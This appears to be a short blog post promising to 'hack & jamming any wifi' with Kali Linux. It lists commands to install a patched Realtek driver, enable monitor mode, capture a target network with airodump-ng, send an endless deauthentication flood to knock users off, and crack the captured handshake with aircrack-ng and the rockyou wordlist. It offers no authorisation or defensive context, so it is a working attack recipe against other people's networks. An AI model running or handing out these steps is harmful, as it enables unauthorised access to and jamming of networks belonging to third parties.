how Wifi Hack (Kali Linux) || Simple Wifi Hacking & jamming with Commands

Hack Wifi With Kali Linux Very  Easy  100% Working

you can hack & jamming any wifi very easy way .beleave me if you 
reached this blog some information is very importent for you like which type of password will never ever hacked easely.



To hack any wifi we need a wifi recever 

we recommend you to use  tp-link 150Mbps  wifi recever 

1. first of all get kali linux machine .

2. pluged in your tp-link wifi recever into the system for peaching.

3. open root terminal and download the tool from github for peatching the recever.

4. follow the commands :-

#sudo apt update

#sudo apt install bc

#sudo rmmod r8188eu.ko

#git clone https://github.com/aircrack-ng/rtl8188eus

#cd rtl8188eus

#sudo -i

#echo "blacklist r8188eu" > "/etc/modprobe.d/realtek.conf"

#exit

#make

#sudo make install

#sudo modprobe 8188eu


Now we are ready to attack :-

required info before hacking wifi

interface = like wlan0 , wlan1 ...etc.

0 = infinity time 


let's start

#ifconfig

#ifconfig wlan0 down

#iwconfig wlan0 mode moniter

#ifconfig wlan0 up

      or

#airmon-ng start wlan0     

    [ this is best way to put your wifi adapter on moniter mode ]

#airmon-ng check kill  

    [ to service NetworkManager stop ]

#airodump-ng wlan0

[ after getting your target stop this processs ]


#airodump-ng --bssid <Router BSSID> --channel (1-11) --write            capturefile wlan0

[ ---- on new root terminal --- ]

#aireplay-ng --deauth 0 -a <Router BSSID> -c <User BSSID > wlan0


[ Unzip the Wordlist ] :-

#sudo gzip -d /usr/share/wordlists/rockyou.txt.gz


[ crack password form handshake file ] :-

#aircrack-ng <YourfileName>.cap  -w /usr/share/wordlists/rockyou.txt







0 Comments